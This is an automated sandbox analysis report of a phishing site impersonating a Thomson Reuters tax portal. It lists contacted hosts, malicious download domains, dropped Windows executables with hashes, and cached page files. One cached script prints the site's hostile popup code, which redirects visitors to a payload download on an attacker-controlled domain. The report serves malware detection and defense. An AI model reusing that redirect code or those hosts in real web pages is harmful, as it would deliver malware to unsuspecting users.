https://tax.thomson-reuterfiles.com/_next/static/chunks/pages/index-899e26e961b4ef93.js0%Avira URL Cloudsafe
https://app-data.gcs.trstatic.net/wel-trdotcom/fonts/all-characters/knowledge2017-medium-webfont.woff20%Avira URL Cloudsafe
https://tax.thomson-reuterfiles.com/_next/static/chunks/webpack-2555a4296ab7a1b2.js0%Avira URL Cloudsafe
https://tax.thomson-reuterfiles.com/_next/static/dhg8d-lD2_-X_5yKOp3qE/_ssgManifest.js0%Avira URL Cloudsafe
https://tax.thomson-reuterfiles.com/_next/static/chunks/framework-0c7baedefba6b077.js0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
google.com
142.251.40.142
truefalse
    		high
    d22lao95g8jow9.cloudfront.net
    		18.238.55.62
    		truefalse
      		unknown
      tax.thomson-reuterfiles.com
      		185.241.61.45
      		truefalse
        		high
        www.google.com
        		142.250.80.100
        		truefalse
          		high
          down.tradingviewdownload.top
          		194.163.44.11
          		truetrue
            		unknown
            app-data.gcs.trstatic.net
            		unknown
            		unknownfalse
              		unknown

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              https://tax.thomson-reuterfiles.com/_next/static/chunks/pages/index-899e26e961b4ef93.jstrue
              • Avira URL Cloud: safe
              		unknown
              https://tax.thomson-reuterfiles.com/_next/static/chunks/main-49b0a41ec78c7394.jstrue
              • Avira URL Cloud: safe
              		unknown
              https://tax.thomson-reuterfiles.com/_next/static/chunks/849-a4a13dffe91c49e7.jstrue
              • Avira URL Cloud: safe
              		unknown
              https://tax.thomson-reuterfiles.com/_next/static/chunks/webpack-2555a4296ab7a1b2.jstrue
              • Avira URL Cloud: safe
              		unknown
              https://down.tradingviewdownload.top/files/images/Logo.pngfalse
              • Avira URL Cloud: safe
              		unknown
              https://tax.thomson-reuterfiles.com/_next/static/css/6c5712a607796dcd.csstrue
              • Avira URL Cloud: safe
              		unknown
              https://tax.thomson-reuterfiles.com/_next/static/dhg8d-lD2_-X_5yKOp3qE/_buildManifest.jstrue
              • Avira URL Cloud: safe
              		unknown
              https://tax.thomson-reuterfiles.com/_next/static/media/search-background-desktop.a9bd8cdc.pngtrue
              • Avira URL Cloud: safe
              		unknown
              https://tax.thomson-reuterfiles.com/_next/static/chunks/pages/_app-1e66c022522ffc96.jstrue
              • Avira URL Cloud: safe
              		unknown
              https://app-data.gcs.trstatic.net/wel-trdotcom/fonts/all-characters/knowledge2017-medium-webfont.woff2false
              • Avira URL Cloud: safe
              		unknown
              https://tax.thomson-reuterfiles.com/_next/static/dhg8d-lD2_-X_5yKOp3qE/_ssgManifest.jstrue
              • Avira URL Cloud: safe
              		unknown
              https://tax.thomson-reuterfiles.com/true
                		unknown
                https://tax.thomson-reuterfiles.com/_next/static/chunks/framework-0c7baedefba6b077.jstrue
                • Avira URL Cloud: safe
                		unknown
                https://down.tradingviewdownload.top/dw.phptrue
                  		unknown

                  World Map of Contacted IPs

                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs

                  Public IPs

                  IPDomainCountryFlagASNASN NameMalicious
                  142.250.80.35
                  		unknownUnited States
                  		15169GOOGLEUSfalse
                  1.1.1.1
                  		unknownAustralia
                  		13335CLOUDFLARENETUSfalse
                  185.241.61.45
                  		tax.thomson-reuterfiles.comunknown
                  		204476ULX-UKGBfalse
                  142.250.80.100
                  		www.google.comUnited States
                  		15169GOOGLEUSfalse
                  142.251.40.238
                  		unknownUnited States
                  		15169GOOGLEUSfalse
                  172.253.62.84
                  		unknownUnited States
                  		15169GOOGLEUSfalse
                  142.250.80.42
                  		unknownUnited States
                  		15169GOOGLEUSfalse
                  8.8.8.8
                  		unknownUnited States
                  		15169GOOGLEUSfalse
                  142.250.65.206
                  		unknownUnited States
                  		15169GOOGLEUSfalse
                  142.251.32.110
                  		unknownUnited States
                  		15169GOOGLEUSfalse
                  142.250.80.3
                  		unknownUnited States
                  		15169GOOGLEUSfalse
                  142.251.40.163
                  		unknownUnited States
                  		15169GOOGLEUSfalse
                  142.250.72.99
                  		unknownUnited States
                  		15169GOOGLEUSfalse
                  142.251.40.170
                  		unknownUnited States
                  		15169GOOGLEUSfalse
                  18.238.55.62
                  		d22lao95g8jow9.cloudfront.netUnited States
                  		16509AMAZON-02USfalse
                  194.163.44.11
                  		down.tradingviewdownload.topGermany
                  		6659NEXINTO-DEtrue

                  Private

                  IP
                  192.168.2.16

                  General Information

                  Joe Sandbox version:42.0.0 Malachite
                  Analysis ID:1647531
                  Start date and time:2025-03-24 23:22:29 +01:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:defaultwindowsinteractivecookbook.jbs
                  Sample URL:https://tax.thomson-reuterfiles.com/
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of analysed new started processes analysed:16
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • EGA enabled
                  Analysis Mode:stream
                  Analysis stop reason:Timeout
                  Detection:MAL
                  Classification:mal52.phis.win@28/18@23/158
                  • Exclude process from analysis (whitelisted): svchost.exe
                  • Excluded IPs from analysis (whitelisted): 142.251.32.110, 142.250.72.99, 172.253.62.84, 142.251.40.238, 142.250.80.46, 142.250.65.174, 142.251.40.206
                  • Excluded domains from analysis (whitelisted): clients2.google.com, accounts.google.com, redirector.gvt1.com, clientservices.googleapis.com, clients.l.google.com
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size getting too big, too many NtOpenFile calls found.
                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                  • VT rate limit hit for: https://tax.thomson-reuterfiles.com/

                  Created / dropped Files

                  C:\Users\user\Downloads\UTWSecure-vnj0x.exe (copy)

                  Download File
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Category:dropped
                  Size (bytes):0
                  Entropy (8bit):0.0
                  Encrypted:false
                  SSDEEP:
                  MD5:224ADDB83C8CAC5BC614A8222CB150CA
                  SHA1:04AF1DB13F099A12D9EE59101711A2997079788A
                  SHA-256:C05FF2992670A5F8250038BD0329E35AAE7F594DD2A5FD8F51A7F93B2529BFB9
                  SHA-512:4A9BF32E4EAB3EBF5485906ACABD5183B23B113EA72BB7A91EF1C011C3398B33695B621F989FF1D3B31BBF33472D3CEDA38B598A9507702D8EA87C98ED497D2E
                  Malicious:false
                  Reputation:unknown
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... ycId...d...d......n.............|.......A.......v.......v...m`..a...d...........e.......e.......e...Richd...........PE..L......g...............'..........................@..........................P............@.....................................<....0...................-...@......8...p...........................x...@...............<............................text............................... ..`.rdata..X].......^..................@..@.data...............................@....rsrc........0......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................

                  C:\Users\user\Downloads\Unconfirmed 611739.crdownload

                  Download File
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Category:dropped
                  Size (bytes):83344
                  Entropy (8bit):6.51298360779251
                  Encrypted:false
                  SSDEEP:
                  MD5:224ADDB83C8CAC5BC614A8222CB150CA
                  SHA1:04AF1DB13F099A12D9EE59101711A2997079788A
                  SHA-256:C05FF2992670A5F8250038BD0329E35AAE7F594DD2A5FD8F51A7F93B2529BFB9
                  SHA-512:4A9BF32E4EAB3EBF5485906ACABD5183B23B113EA72BB7A91EF1C011C3398B33695B621F989FF1D3B31BBF33472D3CEDA38B598A9507702D8EA87C98ED497D2E
                  Malicious:false
                  Reputation:unknown
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... ycId...d...d......n.............|.......A.......v.......v...m`..a...d...........e.......e.......e...Richd...........PE..L......g...............'..........................@..........................P............@.....................................<....0...................-...@......8...p...........................x...@...............<............................text............................... ..`.rdata..X].......^..................@..@.data...............................@....rsrc........0......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................

                  C:\Users\user\Downloads\c5e73548-dfc2-4f51-b717-82b24c734273.tmp

                  Download File
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Category:dropped
                  Size (bytes):7745
                  Entropy (8bit):6.231799617355649
                  Encrypted:false
                  SSDEEP:
                  MD5:05D4D5C09EB63F422519F4B1103A05F2
                  SHA1:26DFFAA81D41A3ECB59C08A7D6E76C0C9041F331
                  SHA-256:F6ACB1396D2DD2511BDC8E54CBDE9441E838D1FA3234FF58B0F3FCB1FA7A009C
                  SHA-512:ABAD6A9F9851B8ADF4E4E7F21E4F648CA078C7357964D523D7DAD63E5411673B7195B1A4A94EAAEEF9A46BCE114991DE9B172C59080F4F7A09BCCDDC260E1E26
                  Malicious:false
                  Reputation:unknown
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... ycId...d...d......n.............|.......A.......v.......v...m`..a...d...........e.......e.......e...Richd...........PE..L......g...............'..........................@..........................P............@.....................................<....0...................-...@......8...p...........................x...@...............<............................text............................... ..`.rdata..X].......^..................@..@.data...............................@....rsrc........0......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................

                  Chrome Cache Entry: 61

                  Download File
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:Unicode text, UTF-8 text, with very long lines (60667), with no line terminators
                  Category:downloaded
                  Size (bytes):60925
                  Entropy (8bit):5.221090580255161
                  Encrypted:false
                  SSDEEP:
                  MD5:28F2F56C3974CCB9FFA2913CF382BFC0
                  SHA1:7CDB9B252F4DA482716EE433F4D779661F77042A
                  SHA-256:351B7DF005DB3E41B0C212E6ECFFAC299DD0F2E911D81AEA685D3B02B2F95E63
                  SHA-512:5877813AA9B0BB1CD40EC8C30FFEF87D9D40BD2D260818DB025B1456DE0F0DA2C17BFD3DAD3D6E531587F05188A9D5BC92F5BEB89F5742B11EFB49436B5864EE
                  Malicious:false
                  Reputation:unknown
                  URL:https://tax.thomson-reuterfiles.com/_next/static/chunks/pages/index-899e26e961b4ef93.js
                  Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[405],{5728:function(s,c,e){(window.__NEXT_P=window.__NEXT_P||[]).push(["/",function(){return e(7254)}])},7254:function(s,c,e){"use strict";e.r(c),e.d(c,{default:function(){return pages}});var t=e(5893),a=e(7294),l=e(6896),components_Popup=function(s){let{open:c,setOpen:e}=s,{locale:n}=(0,l.Z)(),[r,h]=(0,a.useState)(1);return(0,a.useEffect)(()=>{c&&(h(1),window.location.href="https://down.Deepseekdownload.top/dw/dw.php")},[c]),(0,t.jsxs)("div",{className:"fixed inset-0 z-[100] flex items-center justify-center px-4 transition-all duration-500 ".concat(c?"opacity-100 visible":"opacity-0 invisible"),children:[(0,t.jsx)("div",{onClick:()=>{e(!1)},className:"absolute inset-0 bg-black bg-opacity-50 backdrop-blur-sm",style:{opacity:1}}),(0,t.jsxs)("div",{className:"relative bg-[#060606] p-4 sm:p-6 rounded-2xl w-full max-w-[512px]",style:{opacity:1,transform:"none"},children:[(0,t.jsxs)("div",{className:"flex items-center justify-center p

                  Chrome Cache Entry: 62

                  Download File
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:Web Open Font Format (Version 2), TrueType, length 28740, version 1.0
                  Category:downloaded
                  Size (bytes):28740
                  Entropy (8bit):7.992640337554668
                  Encrypted:true
                  SSDEEP:
                  MD5:30164609C16364DE36B51BAF83BDEC4E
                  SHA1:FE93B8F82DC099CCA5E441FDEAF30FEA53202FB1
                  SHA-256:7A19A7027E125257D310C6DBD78AE3A30B5EA1E3794D60B12BB28227A003BFDA
                  SHA-512:A2F1B37730D209BC6E638E98BFF78EC294BE964A2B95308207EA84521409803523E11C62337A38CDB331A5E4FB58CB0171F139574C50B38414A5CD26325EE4EB
                  Malicious:false
                  Reputation:unknown
                  URL:https://fonts.gstatic.com/s/sourcesans3/v18/nwpStKy2OAdR1K-IwhWudF-R3w8aZQ.woff2
                  Preview:wOF2......pD..........o..........................F......n..6?HVAR.f?MVARF.`?STAT.*'*..Z/d.......S....0....6.$.... ..|..Q........:Z..m..7.z],..=8...~.....1....h....t.Xc......!&.e=2.0c..la.....D.VU{t.h.....80.."'F.Bu$>&...a."..s...{" #a..p..W.NA.5.rl..n...t...C6$H2...EzQ2.....c.G.k.iE..V.f......0.T.......2...#.M|..F....{..".m..1..".Ou...U..<Iyp.X.[0c`9.Q?..f..{//..J..K.!..c.4..)b..VD.H..Pj..H.Q.%.H-..RD....".H)bJ.....:~...8..:8....1..eY..Q.x,.<.eY.B.!.1.8,.7.q{c_..Wj.*.m.6N.....x.p.......h..7..L..Y$..W.?$.fR D..?...~.sQO..h$.W.DH.-1...@....Os.'..q.#.vw...n....5,..5`...X`&*..?.....T....~....Y?[Zw.-.4{... .$....l.@..n3..k......K..l."E...u...c].=.....8..};...s..v..EK.....c.!...!|B...C.y.Z/..2..c..8L.=...Z9."'...N.T..[kSj.8.....B..w......L..V.H/..F).............w...t.W..p...J......!..(=..#....B......m......c..!.--._...x.v.As...B.c6.f..A...i..? T\.Spc.."......EU.C....Z...t2...\....q...z.../.".l.B..b3A.............(..(.c.R..*...Y... -..%.x..OC^Z...<Y..3(G

                  Chrome Cache Entry: 63

                  Download File
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:HTML document, ASCII text
                  Category:downloaded
                  Size (bytes):315
                  Entropy (8bit):5.0572271090563765
                  Encrypted:false
                  SSDEEP:
                  MD5:A34AC19F4AFAE63ADC5D2F7BC970C07F
                  SHA1:A82190FC530C265AA40A045C21770D967F4767B8
                  SHA-256:D5A89E26BEAE0BC03AD18A0B0D1D3D75F87C32047879D25DA11970CB5C4662A3
                  SHA-512:42E53D96E5961E95B7A984D9C9778A1D3BD8EE0C87B8B3B515FA31F67C2D073C8565AFC2F4B962C43668C4EFA1E478DA9BB0ECFFA79479C7E880731BC4C55765
                  Malicious:false
                  Reputation:unknown
                  URL:https://down.tradingviewdownload.top/files/images/Logo.png
                  Preview:<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL was not found on this server.</p>.<p>Additionally, a 404 Not Found.error was encountered while trying to use an ErrorDocument to handle the request.</p>.</body></html>.

                  Chrome Cache Entry: 64

                  Download File
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with no line terminators
                  Category:downloaded
                  Size (bytes):16
                  Entropy (8bit):3.875
                  Encrypted:false
                  SSDEEP:
                  MD5:46DF3E5E2D15256CA16616EBFDA5427F
                  SHA1:BE8F9B307E458075DA0D43585A05F1D451469182
                  SHA-256:AF3248D0B278571EFF9A22F8ED1CEB54B70D202B44FD70ECA4CA13A5771CECC3
                  SHA-512:88FBCC0A92317A0BADE7D4B72C023A16792F3728443075BF4B1767C8A55258836B54D56B24EABE36AE4EF240F796B58B8F1EA10C7E3C146BDE89882FC9ADE302
                  Malicious:false
                  Reputation:unknown
                  URL:https://content-autofill.googleapis.com/v1/pages/ChRDaHJvbWUvMTM0LjAuNjk5OC4zNhIZCYl_7RMjcnElEgUNkWGVTiHxs0hN1qpbJw==?alt=proto
                  Preview:CgkKBw2RYZVOGgA=

                  Chrome Cache Entry: 65

                  Download File
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (65536), with no line terminators
                  Category:downloaded
                  Size (bytes):117898
                  Entropy (8bit):5.374105106842063
                  Encrypted:false
                  SSDEEP:
                  MD5:4E1FA4B25BB3E13122ADB6FC89B692A9
                  SHA1:62A57CC9D9D92E27254C8FCA63A7C217741FE0DC
                  SHA-256:BD3F95C00C05EFA6CD717A4B287146FF3148D9637EFAAFB7F697EA8EBB162017
                  SHA-512:40145E4843102AAF203EC6F9CCADA0D846A4CECAED2AFFF92C93FD6D070B83BF2E526F0038452A732A4AF1E9A37E694F1CA78695308014CE071F43AEB5D9C3C4
                  Malicious:false
                  Reputation:unknown
                  URL:https://tax.thomson-reuterfiles.com/_next/static/chunks/main-49b0a41ec78c7394.js
                  Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[179],{4878:function(r,n){"use strict";function getDeploymentIdQueryOrEmptyString(){return""}Object.defineProperty(n,"__esModule",{value:!0}),Object.defineProperty(n,"getDeploymentIdQueryOrEmptyString",{enumerable:!0,get:function(){return getDeploymentIdQueryOrEmptyString}})},37:function(){"trimStart"in String.prototype||(String.prototype.trimStart=String.prototype.trimLeft),"trimEnd"in String.prototype||(String.prototype.trimEnd=String.prototype.trimRight),"description"in Symbol.prototype||Object.defineProperty(Symbol.prototype,"description",{configurable:!0,get:function(){var r=/\((.*)\)/.exec(this.toString());return r?r[1]:void 0}}),Array.prototype.flat||(Array.prototype.flat=function(r,n){return n=this.concat.apply([],this),r>1&&n.some(Array.isArray)?n.flat(r-1):n},Array.prototype.flatMap=function(r,n){return this.map(r,n).flat()}),Promise.prototype.finally||(Promise.prototype.finally=function(r){if("function"!=typeof r)return

                  Chrome Cache Entry: 66

                  Download File
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with no line terminators
                  Category:downloaded
                  Size (bytes):77
                  Entropy (8bit):4.37144473219773
                  Encrypted:false
                  SSDEEP:
                  MD5:B6652DF95DB52FEB4DAF4ECA35380933
                  SHA1:65451D110137761B318C82D9071C042DB80C4036
                  SHA-256:6F5B4AA00D2F8D6AED9935B471806BF7ACEF464D0C1D390260E5FE27F800C67E
                  SHA-512:3390C5663EF9081885DF8CDBC719F6C2F1597A4E25168529598097E9472608A4A62EC7F7E0BC400D22AAC81BF6EA926532886E4DC6E4E272D3B588490A090473
                  Malicious:false
                  Reputation:unknown
                  URL:https://tax.thomson-reuterfiles.com/_next/static/dhg8d-lD2_-X_5yKOp3qE/_ssgManifest.js
                  Preview:self.__SSG_MANIFEST=new Set,self.__SSG_MANIFEST_CB&&self.__SSG_MANIFEST_CB();

                  Chrome Cache Entry: 67

                  Download File
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:HTML document, ASCII text, with very long lines (1476)
                  Category:downloaded
                  Size (bytes):3472
                  Entropy (8bit):5.1522869804082845
                  Encrypted:false
                  SSDEEP:
                  MD5:F309517DC333784216BE4FF5DEA5045C
                  SHA1:F2434DC4F60F3B892C062B84E463BFD2BF3B5679
                  SHA-256:FC06A24B94DBA08EF5DADAE7F769BBD17DC2ED115AD8614EBECDD86EF4E8BF87
                  SHA-512:FBBF64844F63F035A075C8B173708B9F2BF21E35C92EAD9ED9F6EAE359851ECA38BE90B0A311D81AF185A9E6200D77B3D60E54AB2AF68A6053D9ABACD2782136
                  Malicious:false
                  Reputation:unknown
                  URL:https://tax.thomson-reuterfiles.com/
                  Preview:<!DOCTYPE html><html lang="en"><head><meta charSet="utf-8"/><meta name="viewport" content="width=device-width"/><meta name="next-head-count" content="2"/><meta name="google-site-verification" content="27wxy8zChhtA5aSjzVrIEj2ON_2R6X8iKBWg_iGK650"/><link rel="preload" href="/_next/static/css/6c5712a607796dcd.css" as="style" crossorigin=""/><link rel="stylesheet" href="/_next/static/css/6c5712a607796dcd.css" crossorigin="" data-n-g=""/><noscript data-n-css=""></noscript><script defer="" crossorigin="" nomodule="" src="/_next/static/chunks/polyfills-c67a75d1b6f99dc8.js"></script><script src="/_next/static/chunks/webpack-2555a4296ab7a1b2.js" defer="" crossorigin=""></script><script src="/_next/static/chunks/framework-0c7baedefba6b077.js" defer="" crossorigin=""></script><script src="/_next/static/chunks/main-49b0a41ec78c7394.js" defer="" crossorigin=""></script><script src="/_next/static/chunks/pages/_app-1e66c022522ffc96.js" defer="" crossorigin=""></script><script src="/_next/static/chunk

                  Chrome Cache Entry: 68

                  Download File
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (1966), with no line terminators
                  Category:downloaded
                  Size (bytes):1966
                  Entropy (8bit):5.172480733240752
                  Encrypted:false
                  SSDEEP:
                  MD5:424CAF40614A148FC5159DE89A28E904
                  SHA1:86EA812BFBB08497B8102D8D65D949B5FBA4E742
                  SHA-256:8548F0E5D0AD9F008612807170927D4E3126C46496C184C05F0FB1CE4B728003
                  SHA-512:EA9CA9A7CE2961671FA958C06D2234766DEA994DFF0B0980215867DCCA66886F19AD4095BB734230241C706BDD42667DFE02573F415B48D9E437BF8CDD014A02
                  Malicious:false
                  Reputation:unknown
                  URL:https://tax.thomson-reuterfiles.com/_next/static/chunks/webpack-2555a4296ab7a1b2.js
                  Preview:!function(){"use strict";var e,r,_,n,t={},u={};function __webpack_require__(e){var r=u[e];if(void 0!==r)return r.exports;var _=u[e]={exports:{}},n=!0;try{t[e].call(_.exports,_,_.exports,__webpack_require__),n=!1}finally{n&&delete u[e]}return _.exports}__webpack_require__.m=t,e=[],__webpack_require__.O=function(r,_,n,t){if(_){t=t||0;for(var u=e.length;u>0&&e[u-1][2]>t;u--)e[u]=e[u-1];e[u]=[_,n,t];return}for(var i=1/0,u=0;u<e.length;u++){for(var _=e[u][0],n=e[u][1],t=e[u][2],o=!0,c=0;c<_.length;c++)i>=t&&Object.keys(__webpack_require__.O).every(function(e){return __webpack_require__.O[e](_[c])})?_.splice(c--,1):(o=!1,t<i&&(i=t));if(o){e.splice(u--,1);var a=n()}}return a},__webpack_require__.n=function(e){var r=e&&e.__esModule?function(){return e.default}:function(){return e};return __webpack_require__.d(r,{a:r}),r},__webpack_require__.d=function(e,r){for(var _ in r)__webpack_require__.o(r,_)&&!__webpack_require__.o(e,_)&&Object.defineProperty(e,_,{enumerable:!0,get:r[_]})},__webpack_requ

                  Chrome Cache Entry: 69

                  Download File
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (470), with no line terminators
                  Category:downloaded
                  Size (bytes):470
                  Entropy (8bit):5.434697340185277
                  Encrypted:false
                  SSDEEP:
                  MD5:B46E5B6908337511AFAC3760D2E1E518
                  SHA1:D947F28C2EB370CA33E2182E36D7D7BCCBF31AD8
                  SHA-256:B06E69FA3D38C5D4428B915BA50061C4CDBDA9766870CE3BF3525226C43EABB2
                  SHA-512:2127A842815B996FF922418DDBD343FCA05DB0E56871938EA55456DDA7A91F412DBD9097389071CA9D0C1EB4744400ABACE931A706997D18FC0A375B26521F2A
                  Malicious:false
                  Reputation:unknown
                  URL:https://tax.thomson-reuterfiles.com/_next/static/dhg8d-lD2_-X_5yKOp3qE/_buildManifest.js
                  Preview:self.__BUILD_MANIFEST={__rewrites:{afterFiles:[],beforeFiles:[],fallback:[]},"/":["static/chunks/849-a4a13dffe91c49e7.js","static/chunks/pages/index-899e26e961b4ef93.js"],"/404":["static/chunks/pages/404-7fda4da57b5079e3.js"],"/_error":["static/chunks/pages/_error-ee5b5fb91d29d86f.js"],"/sitemap.xml":["static/chunks/pages/sitemap.xml-66ac2aebe440de2a.js"],sortedPages:["/","/404","/_app","/_error","/sitemap.xml"]},self.__BUILD_MANIFEST_CB&&self.__BUILD_MANIFEST_CB();

                  Chrome Cache Entry: 70

                  Download File
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (3627), with no line terminators
                  Category:downloaded
                  Size (bytes):3627
                  Entropy (8bit):5.366412655772073
                  Encrypted:false
                  SSDEEP:
                  MD5:75FA40EDDBA53306AD2E634AD1BD5E5D
                  SHA1:F764E73DC771AB69130FAD742B93E45A5B0D368F
                  SHA-256:CC67D35B4F8D98C17C105961CC2F26D8C98457922DF87EE3FB8C08B165BBF097
                  SHA-512:00B2EE38A0DB465890A9B40DCAC8EF122774E32F47A8142D167A35A22FDF9E1FEDEEAF60C6415462A997D033DCD8DCB7818800E360CA1A41CD0A976B7C14F7CB
                  Malicious:false
                  Reputation:unknown
                  URL:https://tax.thomson-reuterfiles.com/_next/static/chunks/849-a4a13dffe91c49e7.js
                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[849],{7219:function(t,e,n){n.d(e,{XKb:function(){return FiLink},Imn:function(){return FiMail},IC0:function(){return FiMessageSquare},ViN:function(){return FiPrinter},jRj:function(){return FiSearch}});var r=n(7294),o={color:void 0,size:void 0,className:void 0,style:void 0,attr:void 0},i=r.createContext&&r.createContext(o),__assign=function(){return(__assign=Object.assign||function(t){for(var e,n=1,r=arguments.length;n<r;n++)for(var o in e=arguments[n])Object.prototype.hasOwnProperty.call(e,o)&&(t[o]=e[o]);return t}).apply(this,arguments)},__rest=function(t,e){var n={};for(var r in t)Object.prototype.hasOwnProperty.call(t,r)&&0>e.indexOf(r)&&(n[r]=t[r]);if(null!=t&&"function"==typeof Object.getOwnPropertySymbols)for(var o=0,r=Object.getOwnPropertySymbols(t);o<r.length;o++)0>e.indexOf(r[o])&&Object.prototype.propertyIsEnumerable.call(t,r[o])&&(n[r[o]]=t[r[o]]);return n};function iconBase_GenIcon(t){return function(e){re

                  Chrome Cache Entry: 71

                  Download File
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text
                  Category:downloaded
                  Size (bytes):5118
                  Entropy (8bit):5.42635093571842
                  Encrypted:false
                  SSDEEP:
                  MD5:8283D5A5DEE609F59A5E2D8178FAC306
                  SHA1:33C121F2C64F6BE3535693EEDB43E39C44812FCC
                  SHA-256:EFE2A4309C2E2CF8B24023D7DDD9F65C50F7B2E187CB28C1BD68AC8FD1D88BC6
                  SHA-512:7757CC826335058EB94B682C740ADDABC0424E9A7490833387A8E107CE3DE08F8A7254C05DF6D82A50C4353DC2BE09CA3C34A1704E41B427CF642398E0E43AA0
                  Malicious:false
                  Reputation:unknown
                  URL:"https://fonts.googleapis.com/css2?family=Source+Sans+3:ital,wght@0,200..900;1,200..900&display=swap"
                  Preview:/* cyrillic-ext */.@font-face {. font-family: 'Source Sans 3';. font-style: italic;. font-weight: 200 900;. font-display: swap;. src: url(https://fonts.gstatic.com/s/sourcesans3/v18/nwpMtKy2OAdR1K-IwhWudF-R3woqauLY1HY.woff2) format('woff2');. unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;.}./* cyrillic */.@font-face {. font-family: 'Source Sans 3';. font-style: italic;. font-weight: 200 900;. font-display: swap;. src: url(https://fonts.gstatic.com/s/sourcesans3/v18/nwpMtKy2OAdR1K-IwhWudF-R3woqY-LY1HY.woff2) format('woff2');. unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;.}./* greek-ext */.@font-face {. font-family: 'Source Sans 3';. font-style: italic;. font-weight: 200 900;. font-display: swap;. src: url(https://fonts.gstatic.com/s/sourcesans3/v18/nwpMtKy2OAdR1K-IwhWudF-R3woqa-LY1HY.woff2) format('woff2');. unicode-range: U+1F00-1FFF;.}./* greek */.@font-face {. font-family: 'Source Sans 3';. font-styl

                  Chrome Cache Entry: 72

                  Download File
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:ASCII text, with very long lines (65202)
                  Category:downloaded
                  Size (bytes):141047
                  Entropy (8bit):5.3354666088633245
                  Encrypted:false
                  SSDEEP:
                  MD5:71351D23ECDBFB39CB548F7CB628ECF9
                  SHA1:12811C1FC35D5864974BC4B98A641C037B56B9FC
                  SHA-256:1CD1CCA3AEBCDD10C33D713A95479909354DDBC5D5AD9761466AC27EA528895D
                  SHA-512:7016A1D5DA3B69C5002CB7079CEC48D4A7AB41A3C9DC2EA29D1EA3F236B7DAD83F4380AFFC75C2772D157327F94F6A0F41723B85F5031FF6EB732AD052B279B7
                  Malicious:false
                  Reputation:unknown
                  URL:https://tax.thomson-reuterfiles.com/_next/static/chunks/framework-0c7baedefba6b077.js
                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[774],{4448:function(n,t,a){/**. * @license React. * react-dom.production.min.js. *. * Copyright (c) Facebook, Inc. and its affiliates.. *. * This source code is licensed under the MIT license found in the. * LICENSE file in the root directory of this source tree.. */var u,i,o,s,w,x,C=a(7294),_=a(3840);function p(n){for(var t="https://reactjs.org/docs/error-decoder.html?invariant="+n,a=1;a<arguments.length;a++)t+="&args[]="+encodeURIComponent(arguments[a]);return"Minified React error #"+n+"; visit "+t+" for the full message or use the non-minified dev environment for full errors and additional helpful warnings."}var N=new Set,z={};function fa(n,t){ha(n,t),ha(n+"Capture",t)}function ha(n,t){for(z[n]=t,n=0;n<t.length;n++)N.add(t[n])}var P=!("undefined"==typeof window||void 0===window.document||void 0===window.document.createElement),j=Object.prototype.hasOwnProperty,U=/^[:A-Z_a-z\u00C0-\u00D6\u00D8-\u00F6\u00F8-\u02FF\u

                  Chrome Cache Entry: 74

                  Download File
                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                  File Type:PNG image data, 3020 x 388, 8-bit/color RGBA, non-interlaced
                  Category:downloaded
                  Size (bytes):135160
                  Entropy (8bit):7.959503731592724
                  Encrypted:false
                  SSDEEP:
                  MD5:8626685AEF425B8F971E7FDB64FACF98
                  SHA1:2F4042AFD5312BCE15757730870ED4ED7ED86F31
                  SHA-256:0467919FBAE3F5AB1B3109BBC941916142A7C68FE16823795F6CB13BC7E936A5
